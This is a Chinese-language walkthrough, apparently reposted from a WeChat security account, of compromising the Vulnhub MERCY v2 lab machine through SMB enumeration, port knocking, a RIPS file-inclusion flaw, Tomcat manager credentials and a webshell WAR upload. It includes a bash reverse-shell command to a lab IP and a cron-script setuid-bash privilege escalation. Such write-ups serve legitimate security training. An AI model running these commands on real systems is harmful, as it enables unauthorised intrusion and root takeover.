a这里做了一个简单下信息收集,直接就可以看到有一个8080端口,一看,发现是可以尝试put协议的,所以就可以去尝试上传漏洞
这里就可以看到是设置了tomcat的,直接访问一个错误界面,发现了中间件版本是 7.0.52,而put上传漏洞影响范围就在其中,就可以直接去做尝试了
可以用冰蝎或者哥斯拉做一个码,这里经过上传,发现这个漏洞并不行,就去扫扫目录吧
这个时候就发现了是有robots的,
这里就可以去看看
发现就是一个base64的编码,直接解码一下
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.
发现这里是一个提示,说密码是password,那么这里就肯定是有用的,就是不知道哪里能够用到。所以就先留着,通过扫目录也没看到后台什么的,所以就直接去看看开启的端口,因为这里是开启了端口,本来想着试试是否是ssh,但是发现ssh并没有开放,然后就发现是开放了smb,对于靶场来说,每个端口的开放都是有一定作用的,所以这里就来用 enum4linux
扫一下samba服务
这里就发现一个共享文件夹,
这个时候就可以用到上面的密码了
成功的访问,就可以看看给出的什么东西了,发现有几个文件夹,这里可以进去看看
在这里面就是有了两个配置文件,因为在这个共享文件夹里面是没办法访问的,所以就可以直接下载下来查看
这里就可以看到是一个端口敲门的配置文件
这里就发现了,是有一个工具knock来做的开启 22 端口和 80 端口
这里敲门过以后再去看一下端口的是开启了22和80的,这个时候就可以去看看80了
这里就成功的打开了80端口,这里就再次去扫一下目录看一下
这里就看到是有一个登录一个robots.txt的
这里也是给出了两个目录,因为登录界面发现没有什么东西就直接来看这两个目录了
然后在第二个中发现是 RIPS 框架
这里发现了框架的话就可以直接去找了,然后找到了一个,直接去看
这里就可以看到了,是一个文件包含的漏洞,那么就可以直接去利用
这里就发现是可以进行利用的,这里是apache的中间件,那么可以试试能不能拿到日志文件
这里发现拿不到日志文件,那么日志污染就不能用,然后我就发现了在一开始的8080端口是有一个路径的
这里说的,管理员用户配置是在 tomcat-user.xml中
这里发现了账号密码
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
在上次扫到的8080端口里面是有一个登录界面的,所以这次就拿到用户密码了
这里就成功的拿到了后台,那就去找那个后台的文件上传了
利用冰蝎生成一个木马,做一个war包就可以了,然后上传
也是成功上传了
上传的路径也就在这里,可以直接去连接试试
这里也就成功的连接上了
这里就可以去做一个提权了,在上面我们是发现了两个账号密码的
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
我们包含passwd的时候发现了确实是有fluffy这个账号的,那么我们就可以直接去这个账号上面去看看,这里首先要反弹shell过去
bash -c "bash -i >& /dev/tcp/192.168.193.128/8888 0>&1"
也就成功的弹了过去,然后再切换到 fluffy 账号上面,这里要注意的是必须要去做一个交互shell才能够换用户
python -c 'import pty;pty.spawn("/bin/bash")'
这样也就成功的切换了用户,那么就可以看看提权了,当然了,在尝试过各种提权方式过以后,找到了
这个目录下面的
文件是一个定时任务,还是有root权限的
那么就可以利用这个来进行提权了
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash'>>timeclock
cd /tmp
/tmp/bash -p
原文始发于微信公众号(鼎新安全):Vulnhub | MERCY v2靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论